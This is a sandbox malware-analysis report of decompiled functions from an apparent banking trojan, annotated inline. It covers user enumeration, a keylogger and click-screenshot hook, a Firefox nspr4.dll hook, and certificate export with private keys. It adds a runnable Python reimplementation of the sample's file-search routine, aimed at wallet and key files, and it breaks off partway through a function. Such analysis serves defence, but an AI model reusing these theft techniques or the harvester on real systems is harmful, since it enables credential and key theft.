            • API ID: CloseHandle$CreateEventFileVirtual$MemoryMutexOpenProcessProtectReadWait$AttributesExitFreeKnownMultipleObjectObjectsSingleSizeSleepWellWindows
            • String ID:
            • API String ID: 3536541236-3916222277
            • Opcode ID: d0ff7cacfb7bbb368fd0cb2b8f1319355dd092e854707bbf70fe93a17844206b
            • Instruction ID: 0570cbbd4e6b7887250b709a7b465c8e14734cf32ab0943f83678e72b77f4c54
            • Opcode Fuzzy Hash: d0ff7cacfb7bbb368fd0cb2b8f1319355dd092e854707bbf70fe93a17844206b
            • Instruction Fuzzy Hash: 9691C471108345AFD710EF618D45EAF7BE8AB89714F40093EF680B62E1D739D9488B6B
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 81%
            			E00405838(void* __eflags) {
            				char _v5;
            				char* _v12;
            				char _v16;
            				int _v20;
            				int _v24;
            				int _v28;
            				int _v32;
            				char _v56;
            				char _v88;
            				char _v608;
            				short _v1128;
            				char _v1648;
            				void* __edi;
            				void* __esi;
            				_Unknown_base(*)()* _t63;
            				int _t69;
            				char _t70;
            				char _t76;
            				int _t80;
            				char _t81;
            				char _t82;
            				char _t86;
            				char _t88;
            				WCHAR* _t98;
            				int _t99;
            				CHAR* _t110;
            				char* _t111;
            				WCHAR* _t112;
            				struct HINSTANCE__* _t113;
            				signed int _t114;
            				void* _t115;
            
            				_t112 =  &_v56;
            				_v5 = 0;
            				E0040F369(0xae, _t112);
            				_t113 = LoadLibraryW(_t112);
            				if(_t113 == 0) {
            					L7:
            					return 0;
            				} else {
            					_t110 =  &_v88;
            					E0040F333(0xaf, _t110);
            					_t63 = GetProcAddress(_t113, _t110);
            					if(_t63 != 0) {
            						_push( &_v12);
            						_t106 =  &_v608;
            						_push( &_v608);
            						_v12 = 0x104;
            						if( *_t63() == 1) {
            							_t98 =  &_v1128;
            							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
            							if(_t98 == 0) {
            								_t106 =  &_v608;
            								_t99 = E00411098(_t106);
            								_v12 = _t99;
            								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
            									_t106 = _t115 + _v12 * 2 - 0x464;
            									E004107C1(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
            									_v5 = 1;
            								}
            							}
            						}
            					}
            					FreeLibrary(_t113);
            					if(_v5 != 0) {
            						_v5 = 0;
            						_v28 = 0;
            						_t111 = L".exe";
            						do {
            							_v12 = 0;
            							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
            							_v24 = _t69;
            							__eflags = _t69;
            							if(_t69 == 0) {
            								L11:
            								__eflags = _v12;
            								if(_v12 == 0) {
            									goto L24;
            								}
            								_t114 = 0;
            								__eflags = _v20;
            								if(_v20 <= 0) {
            									L23:
            									NetApiBufferFree(_v12);
            									goto L24;
            								} else {
            									goto L13;
            								}
            								do {
            									L13:
            									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
            									__eflags = _t80;
            									if(_t80 == 0) {
            										_t81 = _v16;
            										__eflags = _t81;
            										if(_t81 != 0) {
            											_t106 =  &_v608;
            											_t82 = E0040F504( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
            											__eflags = _t82;
            											if(_t82 != 0) {
            												_t86 = E00415D45( &_v1128,  &_v608,  &_v608);
            												__eflags = _t86;
            												if(_t86 != 0) {
            													_t88 = E00415AC4( &_v608);
            													__eflags = _t88;
            													if(_t88 != 0) {
            														__eflags = E0041484C(0,  &_v608,  &_v1648, _t111, 6);
            														if(__eflags != 0) {
            															__eflags = E00404F83( &_v608, __eflags, 0,  &_v1648, 0);
            															if(__eflags != 0) {
            																_v5 = 1;
            																E004050B0( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
            															}
            														}
            													}
            												}
            											}
            											NetApiBufferFree(_v16);
            										}
            									}
            									_t114 = _t114 + 1;
            									__eflags = _t114 - _v20;
            								} while (_t114 < _v20);
            								goto L23;
            							}
            							__eflags = _t69 - 0xea;
            							if(_t69 != 0xea) {
            								break;
            							}
            							goto L11;
            							L24:
            							__eflags = _v24 - 0xea;
            						} while (_v24 == 0xea);
            						_t70 =  &_v1128;
            						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
            						__eflags = _t70;
            						if(_t70 == 0) {
            							__eflags = E0041484C(0,  &_v1128,  &_v1648, _t111, 6);
            							if(__eflags != 0) {
            								_t76 = E00404F83(_t106, __eflags, 0,  &_v1648, 0);
            								__eflags = _t76;
            								if(_t76 != 0) {
            									_v5 = 1;
            								}
            							}
            						}
            						return _v5;
            					}
            					goto L7;
            				}
            			}

            APIs
            • LoadLibraryW.KERNEL32(?,761B5B60,7620F9B0,00000000), ref: 00405859
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040587A
            • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 004058AB
            • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 004058CE
            • FreeLibrary.KERNEL32(00000000), ref: 004058F5
            • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 0040592B
            • NetUserGetInfo.NETAPI32(00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405963
            • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 004059FB
            • NetApiBufferFree.NETAPI32(?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405A0D
            • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405A30
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
            • String ID: .exe
            • API String ID: 1753652487-4119554291
            • Opcode ID: b4113bde39edea5eacf7a11ac19038a1ec4d2c8bd4da7d4e25e0dc7e5bdef474
            • Instruction ID: 2e6b0f9464f0d21a44254aa70c38c5ad5f317791c8adbc37b3a985964a75f40a
            • Opcode Fuzzy Hash: b4113bde39edea5eacf7a11ac19038a1ec4d2c8bd4da7d4e25e0dc7e5bdef474
            • Instruction Fuzzy Hash: 54518FB1900618AADF20EBA4CC84FEF77BCEB45314F0045BAB551F7192D6399A498F68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 58%
            			E00411D38(void* _a4, WCHAR* _a8) {
            				WCHAR* _v5;
            				char _v12;
            				signed int _v16;
            				struct HINSTANCE__* _v20;
            				_Unknown_base(*)()* _v24;
            				struct _PROCESS_INFORMATION _v40;
            				struct _STARTUPINFOW _v108;
            				struct HINSTANCE__* _t28;
            				_Unknown_base(*)()* _t31;
            				WCHAR* _t49;
            				long _t50;
            				intOrPtr* _t52;
            
            				_v5 = 0;
            				_t28 = LoadLibraryA("userenv.dll");
            				_v20 = _t28;
            				if(_t28 != 0) {
            					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
            					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
            					_v24 = _t31;
            					if(_t52 != 0 && _t31 != 0) {
            						_push(0);
            						_push(_a4);
            						_push( &_v16);
            						_v16 = 0;
            						if( *_t52() == 0) {
            							_v16 = 0;
            						}
            						_t50 = 0x44;
            						_v12 = 0;
            						E004104CB( &_v108,  &_v108, 0, _t50);
            						_t49 = _a8;
            						_v108.cb = _t50;
            						_v108.lpDesktop = 0;
            						if(_t49 == 0) {
            							_t49 =  &_v12;
            						}
            						asm("sbb eax, eax");
            						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
            							CloseHandle(_v40.hThread);
            							CloseHandle(_v40);
            							_v5 = _v40.dwProcessId != 0;
            						}
            						if(_v16 != 0) {
            							_v24(_v16);
            						}
            					}
            					FreeLibrary(_v20);
            				}
            				return _v5 & 0x000000ff;
            			}

            APIs
            • LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00411D49
            • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00411D68
            • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00411D74
            • CreateProcessAsUserW.ADVAPI32(?,00000000,00405093,00000000,00000000,00000000,00405093,00405093,00000000,?,?,?,00000000,00000044), ref: 00411DE5
            • CloseHandle.KERNEL32(?), ref: 00411DF8
            • CloseHandle.KERNEL32(?), ref: 00411DFD
            • FreeLibrary.KERNEL32(?), ref: 00411E14
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
            • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
            • API String ID: 3080530829-1103369309
            • Opcode ID: a3f3ac57ce7f1394c0d21c175224517e03010a6eb915f55cc6c73d2daa4fd471
            • Instruction ID: 2e7cdb2c0a66f9eb63995a55435bba8bb47d36db070de9df0429496f699640a4
            • Opcode Fuzzy Hash: a3f3ac57ce7f1394c0d21c175224517e03010a6eb915f55cc6c73d2daa4fd471
            • Instruction Fuzzy Hash: 1B21FAB2D0025DBBDF109FE5CC849EEBBBCEB08344B10446AE615B6160D6399E55CB64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00415BE8(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
            				short _v524;
            				struct _WIN32_FIND_DATAW _v1116;
            				intOrPtr _v1120;
            				intOrPtr _v1124;
            				void* _v1128;
            				int _t51;
            				signed int _t60;
            				long _t68;
            				signed char _t71;
            				signed int _t83;
            
            				_v1120 = __edx;
            				_v1124 = __ecx;
            				_t51 = E00415D45(0x4034fc,  &_v524, __ecx);
            				if(_t51 == 0) {
            					L25:
            					return _t51;
            				}
            				_t51 = FindFirstFileW( &_v524,  &_v1116);
            				_v1128 = _t51;
            				if(_t51 != 0xffffffff) {
            					_t71 = _a8;
            					while(1) {
            						_t83 = 0;
            						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) { // optional stop event (_a20): anything other than WAIT_TIMEOUT (0x102) aborts the walk
            							break;
            						}
            						if(E00415A06( &(_v1116.cFileName)) != 0) {
            							L23:
            							if(FindNextFileW(_v1128,  &_v1116) != 0) {
            								continue;
            							}
            							break;
            						}
            						_t60 = _v1116.dwFileAttributes & 0x00000010; // FILE_ATTRIBUTE_DIRECTORY
            						if(_t60 == 0 || (_t71 & 0x00000002) == 0) { // _a8 bit 2: apply the masks to directories
            							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) { // _a8 bit 4: apply the masks to files
            								goto L17;
            							} else {
            								goto L10;
            							}
            						} else {
            							L10:
            							if(_a4 <= 0) {
            								L17:
            								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00415D45( &(_v1116.cFileName),  &_v524, _v1124) != 0) { // _a8 bit 1: recurse into sub-directories (E00415D45 = PathCombineW, see APIs)
            									_t103 = _a24;
            									if(_a24 != 0) {
            										Sleep(_a24); // throttle before descending into each sub-directory
            									}
            									_t38 =  &_a28; // 0x407c5c
            									E00415BE8( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24,  *_t38);
            								}
            								goto L23;
            							}
            							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) { // try each of the _a4 wildcard masks in _v1120
            								_t83 = _t83 + 1;
            								if(_t83 < _a4) {
            									continue;
            								}
            								goto L17;
            							}
            							_t68 = _a12(_a16); // caller-supplied callback on a hit; a zero return ends enumeration of this directory only
            							__eflags = _t68;
            							if(_t68 == 0) {
            								break;
            							}
            							__eflags = _a28;
            							if(_a28 != 0) {
            								Sleep(_a28); // throttle after each hit
            							}
            							goto L17;
            						}
            					}
            					_t51 = FindClose(_v1128);
            				}
            			}

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
            • PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
            • Sleep.KERNEL32(00000000), ref: 00415CC6
            • Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
            • FindNextFileW.KERNEL32(?,?), ref: 00415D24
            • FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
            • String ID: \|@
            • API String ID: 2348139788-1873901996
            • Opcode ID: 1cd263cefc17981cd0b735e9befd53d87b58f334536fc2cf656e31c27bcea100
            • Instruction ID: 34cdfae5f1f4439a7781b1af597a3a6261eff9f88ee715c27aa3308340705003
            • Opcode Fuzzy Hash: 1cd263cefc17981cd0b735e9befd53d87b58f334536fc2cf656e31c27bcea100
            • Instruction Fuzzy Hash: 78418C3100470ADFCB21DF14D948BDF7BA9EF84354F10892AF990962A1E33AD895CB99
            Uniqueness

            Uniqueness Score: -1.00%
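E00415BE8 is the sample's recursive file search: it joins the directory with a wildcard (E00415D45 wraps PathCombineW), walks it with FindFirstFileW/FindNextFileW, runs a list of PathMatchSpecW masks over each entry, calls a caller-supplied callback on every hit and descends into sub-directories when bit 1 of its flags argument is set, with two optional Sleep() throttles and an optional stop event. The Python below is an added example, not code from the sample or from Joe Sandbox: it reimplements those semantics portably so the flag bits and the per-directory effect of a zero callback return can be exercised against a constructed directory tree. The constant names, `walk()`, `collect()` and `build_sample_tree()` are this example's own, the stop event is modelled with a `threading.Event` instead of a Win32 handle, and `sorted(os.listdir())` stands in for the filesystem-dependent FindFirstFile order.

```python
import fnmatch
import os
import shutil
import tempfile
import threading
import time

# Flag bits inferred from E00415BE8's tests on its _a8 argument. The names are
# this example's own; the sample uses the bare constants.
WALK_RECURSE = 0x1       # (_a8 & 1) descend into sub-directories
WALK_MATCH_DIRS = 0x2    # (_a8 & 2) run the mask list against directory names
WALK_MATCH_FILES = 0x4   # (_a8 & 4) run the mask list against file names


def _matches(name, masks):
    # PathMatchSpecW compares case-insensitively; fnmatchcase on lower-cased
    # strings approximates that (';'-separated spec lists are not modelled).
    low = name.lower()
    return any(fnmatch.fnmatchcase(low, m.lower()) for m in masks)


def walk(base, masks, flags, callback, stop_event=None,
         dir_delay=0.0, match_delay=0.0):
    """Enumerate `base` the way E00415BE8 does.

    callback(path) runs for every entry that passes the flag/mask filter; a
    falsy return ends enumeration of the current directory only (the sample's
    `if(_t68 == 0) break;`), the parent directory keeps going.  stop_event
    stands in for the optional event handle polled with
    WaitForSingleObject(h, 0).  dir_delay/match_delay are the two Sleep()
    throttles: _a24 before each recursion, _a28 after each hit.
    """
    try:
        entries = sorted(os.listdir(base))   # FindFirstFileW/FindNextFileW
    except OSError:
        return
    for name in entries:
        if stop_event is not None and stop_event.is_set():
            return
        path = os.path.join(base, name)
        is_dir = os.path.isdir(path)
        candidate = (is_dir and flags & WALK_MATCH_DIRS) or \
                    (not is_dir and flags & WALK_MATCH_FILES)
        if candidate and masks and _matches(name, masks):
            if not callback(path):
                return
            if match_delay:
                time.sleep(match_delay)
        if is_dir and flags & WALK_RECURSE:
            if dir_delay:
                time.sleep(dir_delay)
            walk(path, masks, flags, callback, stop_event, dir_delay, match_delay)


def build_sample_tree():
    """Constructed tree for the demo (nothing here comes from the sandbox run)."""
    root = tempfile.mkdtemp(prefix="walkdemo_")
    for rel in ("notes.txt", "wallet.dat", "sub/keys.txt",
                "sub/deeper/cert.pfx", "sub/deeper/readme.TXT"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "wb").close()
    return root


def collect(root, masks, flags, limit=None, stop_before_start=False):
    """Run walk() and return the hits as root-relative paths in visit order.

    limit=N makes the callback return False once N hits exist, which shows
    that a zero return only stops the directory currently being enumerated.
    """
    hits = []
    stop = threading.Event()
    if stop_before_start:
        stop.set()

    def on_hit(path):
        hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
        return limit is None or len(hits) < limit

    walk(root, masks, flags, on_hit, stop_event=stop)
    return hits


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        print(collect(root, ["*.txt"], WALK_RECURSE | WALK_MATCH_FILES))
        print(collect(root, ["*.txt"], WALK_MATCH_FILES))
        print(collect(root, ["sub"], WALK_MATCH_DIRS))
        print(collect(root, ["*.pfx", "keys.*"], WALK_RECURSE | WALK_MATCH_FILES, limit=1))
    finally:
        shutil.rmtree(root)
```

Note that with bit 1 set but neither bit 2 nor bit 4, the walker descends the whole tree and never reports anything, and that a callback returning zero from inside a sub-directory does not stop the parent's enumeration; both follow directly from the decompiled control flow.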

            C-Code - Quality: 91%
            			E0040BB78(MSG* _a4) {
            				char _v524;
            				char _v780;
            				char _v840;
            				char _v864;
            				short _v884;
            				intOrPtr* _v888;
            				intOrPtr _v900;
            				void* __edi;
            				void* __esi;
            				int _t26;
            				signed int _t28;
            				signed int _t33;
            				intOrPtr _t40;
            				WCHAR* _t45;
            				MSG* _t54;
            				WCHAR* _t65;
            				intOrPtr* _t66;
            				signed int _t67;
            				void* _t69;
            
            				_t69 = (_t67 & 0xfffffff8) - 0x374;
            				_t54 = _a4;
            				if(_t54 == 0 || E00403E39() == 0) {
            					L20:
            					E00403E2A();
            					return TranslateMessage(_t54); // this function sits in front of TranslateMessage as a hook and forwards the message after logging
            				} else {
            					_t26 = _t54->message;
            					if(_t26 != 0x201) { // WM_LBUTTONDOWN
            						__eflags = _t26 - 0x100;
            						if(_t26 != 0x100) { // only WM_KEYDOWN is logged
            							goto L20;
            						}
            						__eflags = _t54->wParam - 0x1b;
            						if(_t54->wParam == 0x1b) { // VK_ESCAPE is ignored
            							goto L20;
            						}
            						_t28 = GetKeyboardState( &_v780);
            						__eflags = _t28;
            						if(_t28 == 0) {
            							goto L20;
            						}
            						_t33 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0); // virtual key + current keyboard state -> the character(s) the user actually typed
            						__eflags = _t33;
            						if(_t33 <= 0) {
            							goto L20;
            						}
            						__eflags = _t33 - 1;
            						if(__eflags != 0) {
            							if(__eflags > 0) {
            								L18:
            								__eflags = 0;
            								 *((short*)(_t69 + 0x10 + _t33 * 2)) = 0;
            								_push( &_v884);
            								L19:
            								E0040B9DA();
            								goto L20;
            							}
            							L17:
            							__eflags = _v884 - 0x20;
            							if(_v884 < 0x20) { // control characters are dropped
            								goto L20;
            							}
            							goto L18;
            						}
            						__eflags = _t54->wParam - 8;
            						if(_t54->wParam != 8) { // VK_BACK is logged as the fixed marker string at 0x402148 instead
            							goto L17;
            						}
            						_push(0x402148);
            						goto L19;
            					}
            					EnterCriticalSection(0x41aa48);
            					if( *0x41aa40 > 0) { // remaining screen-capture budget
            						 *0x41aa40 =  *0x41aa40 + 0xffff; // 16-bit decrement: one capture per left click while the budget lasts (E0040FE5C resolves GDI+/BitBlt, see APIs)
            						E0040F369(0xa3,  &_v864);
            						_t40 = E0040FE5C( &_v864, 0x1e, 0x1f4);
            						_v900 = _t40;
            						if(_t40 != 0) {
            							E0040F369(0xa1,  &_v840);
            							_t65 =  &_v884;
            							E0040F369(0xa2, _t65);
            							_t45 =  *0x41aa38; // 0x0
            							if(_t45 != 0) {
            								_t65 = _t45;
            							}
            							E004111A5( &_v840, 0x104,  &_v524,  &_v840);
            							_t66 = _v888;
            							E0040D8BD(0x104, _t66,  &_v524);
            							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x41a504, GetTickCount());
            						}
            					}
            					LeaveCriticalSection(0x41aa48);
            					goto L20;
            				}
            			}

            APIs
            • TranslateMessage.USER32(?), ref: 0040BCDB
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041AA48), ref: 0040BBB2
            • LeaveCriticalSection.KERNEL32(0041AA48), ref: 0040BC5C
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040FE8E
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040FE9F
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040FEAC
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040FEB9
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040FEC6
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040FED3
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040FEE0
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040FEED
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040FF35
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040FF40
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040FF52
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040FF5D
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040FF69
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040FF76
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040FF83
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040FF90
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040FF9D
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040FFAA
            • GetTickCount.KERNEL32 ref: 0040BC1E
            • GetKeyboardState.USER32(?), ref: 0040BC76
            • ToUnicode.USER32 ref: 0040BC9E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
            • String ID:
            • API String ID: 2762424063-3916222277
            • Opcode ID: 53be9f3ad33f239bdeda54af3c80ad35e67e03f14dd7125bc779962428129741
            • Instruction ID: e08231d18bc84dcb6ded2eb18476844021f445330572d20377e9be584710106a
            • Opcode Fuzzy Hash: 53be9f3ad33f239bdeda54af3c80ad35e67e03f14dd7125bc779962428129741
            • Instruction Fuzzy Hash: E931BF316083019BEB20AB65CD49A9B77A8EF44310F04453FB955F72E2DB38C984C7AE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E00404B6E(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
            				void* __edi;
            				void* _t13;
            				long _t14;
            				void* _t17;
            				void* _t18;
            				void* _t22;
            				void* _t23;
            				void* _t24;
            				UNICODE_STRING* _t25;
            				void* _t29;
            				HMODULE* _t30;
            				struct _OBJDIR_INFORMATION _t32;
            
            				E00403E2A();
            				if(E00403E39() != 0) {
            					_t30 = _a16;
            					_t25 = _a12;
            					_t13 =  *0x41a2c4(_a4, 0, _t25, _t30, _t24, _t29, _t18); // LdrGetDllHandle (see APIs): is the module already loaded?
            					_t14 = LdrLoadDll(_a4, _a8, _t25, _t30); // forward to the real LdrLoadDll
            					_a4 = _t14;
            					if(_t13 < 0 && _t14 >= 0 && _t30 != 0 &&  *_t30 != 0 && _t25 != 0) { // acts only on the first successful load of a module that was not yet present
            						EnterCriticalSection(0x41a760);
            						if(( *0x41a28c & 0x00000001) == 0) { // hook not yet installed
            							_t32 =  *_t30;
            							if(lstrcmpiW( *(_t25 + 4), L"nspr4.dll") != 0) { // UNICODE_STRING.Buffer of the requested module: Firefox's NSPR library
            								_t17 = 0;
            							} else {
            								_t17 = E004064DA(_t22, _t23, _t32); // patch the freshly loaded nspr4.dll image (HMODULE in _t32)
            							}
            							if(_t17 != 0) {
            								 *0x41a28c =  *0x41a28c | 0x00000001;
            							}
            						}
            						LeaveCriticalSection(0x41a760);
            					}
            					return _a4;
            				}
            				goto ( *0x41a2c0); // hook inactive: tail-jump to the saved original LdrLoadDll entry
            			}

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00404B96
            • LdrLoadDll.NTDLL(?,?,?,?), ref: 00404BA6
            • EnterCriticalSection.KERNEL32(0041A760), ref: 00404BCA
            • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00404BE4
            • LeaveCriticalSection.KERNEL32(0041A760), ref: 00404C05
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalObjectSectionSingleWait$EnterHandleLeaveLoadlstrcmpi
            • String ID: @xIw$nspr4.dll
            • API String ID: 535701974-2259834031
            • Opcode ID: 7ac4b77c6cab6ce32a43cbb7000b02916107e38f2214fb2c92d661dca98e51c2
            • Instruction ID: 3ba081853ac8bbff4652b9135745bf2aa541a484130f759e0cfe84903ceb8739
            • Opcode Fuzzy Hash: 7ac4b77c6cab6ce32a43cbb7000b02916107e38f2214fb2c92d661dca98e51c2
            • Instruction Fuzzy Hash: 981104B1106204ABDB109F51DC48BAB3BA8AF80315F01807AFE04B33A1D739EC11CBAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 16%
            			E00409FE2(intOrPtr __eax) {
            				char _v588;
            				char _v716;
            				char _v844;
            				char _v885;
            				intOrPtr _v892;
            				intOrPtr _v893;
            				char _v896;
            				char _v900;
            				char _v901;
            				char _v904;
            				char _v908;
            				struct _SYSTEMTIME _v924;
            				intOrPtr _v928;
            				intOrPtr _v940;
            				intOrPtr _v944;
            				char _v949;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t34;
            				intOrPtr _t40;
            				void* _t63;
            				WCHAR* _t67;
            				void* _t68;
            				void* _t69;
            				void* _t71;
            				void* _t73;
            				intOrPtr* _t75;
            				char* _t76;
            				intOrPtr* _t77;
            				char* _t78;
            
            				_v885 = 0;
            				__imp__CertOpenSystemStoreW(0, L"MY", _t69, _t73, _t63); // the current user's personal certificate store
            				_v892 = __eax;
            				if(__eax == 0) {
            					L16:
            					return _v893;
            				}
            				_t75 = __imp__CertEnumCertificatesInStore;
            				_t71 = 0;
            				_t33 =  *_t75(__eax, 0); // CertEnumCertificatesInStore: count the certificates in the store
            				if(_t33 == 0) {
            					L4:
            					_v901 = 1;
            					L15:
            					__imp__CertCloseStore(_v900, 0);
            					goto L16;
            				} else {
            					goto L2;
            				}
            				do {
            					L2:
            					_t71 = _t71 + 1;
            					_t33 =  *_t75(_v900, _t33);
            				} while (_t33 != 0);
            				if(_t71 != 0) {
            					_t76 =  &_v896;
            					_t34 = 0x7f;
            					_v900 = 0;
            					_v904 = 0;
            					E0040F369(_t34, _t76); // string 0x7f from the sample's string table: the password for the exported PFX
            					_push(4); // dwFlags = EXPORT_PRIVATE_KEYS: private keys are written into the PFX as well
            					_push(0);
            					_t77 = __imp__PFXExportCertStoreEx;
            					_push(_t76);
            					_push( &_v904);
            					_push(_v908);
            					if( *_t77() != 0) { // first PFXExportCertStoreEx call with pbData == NULL only returns the required size
            						_t39 = _v924.wYear;
            						if(_v924.wYear != 0) {
